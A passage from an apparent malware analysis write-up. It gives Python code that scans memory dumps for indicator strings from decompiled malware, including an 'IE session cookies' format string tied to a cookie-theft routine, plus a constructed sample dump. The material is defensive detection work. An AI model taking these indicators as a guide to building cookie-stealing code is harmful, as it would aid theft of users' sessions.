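        hits.append(i)
        start = i + 1


def scan(dump):
    """Return {indicator_text: [offsets]} for every indicator present in dump,
    searching each one in the encoding the decompiled code stores it in."""
    found = {}
    for text, enc, _routine in INDICATORS:
        hits = find_all(dump, text.encode(enc))
        if hits:
            found[text] = hits
    return found


def routines_hit(dump):
    """Names of the routines whose literals were seen. Weak atoms alone are
    not enough; at least one longer literal must be present as well."""
    found = scan(dump)
    if not any(t not in WEAK_ATOMS for t in found):
        return set()
    return {routine for text, _enc, routine in INDICATORS if text in found}


# Constructed dump: filler bytes around three of the literals, laid out so the
# narrow string sits at offset 16 and the two UTF-16 strings follow it.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"PopOpO03-3331111\x00"
    + b"\x90" * 8
    + "%S\r\nIE session cookies:\r\n%S".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 4
    + ".lll".encode("utf-16-le") + b"\x00\x00"
)


if __name__ == "__main__":
    for text, offsets in scan(SAMPLE_DUMP).items():
        print(f"{text!r}: {[hex(o) for o in offsets]}")
    print("routines:", sorted(routines_hit(SAMPLE_DUMP)))
```

Run against a real dump (for example bytes read from the .sdmp file cited in the Memory Dump Source lines) the offsets come back relative to the dump start, which for a dump based on the PE at 0x400000 is the same as the RVA.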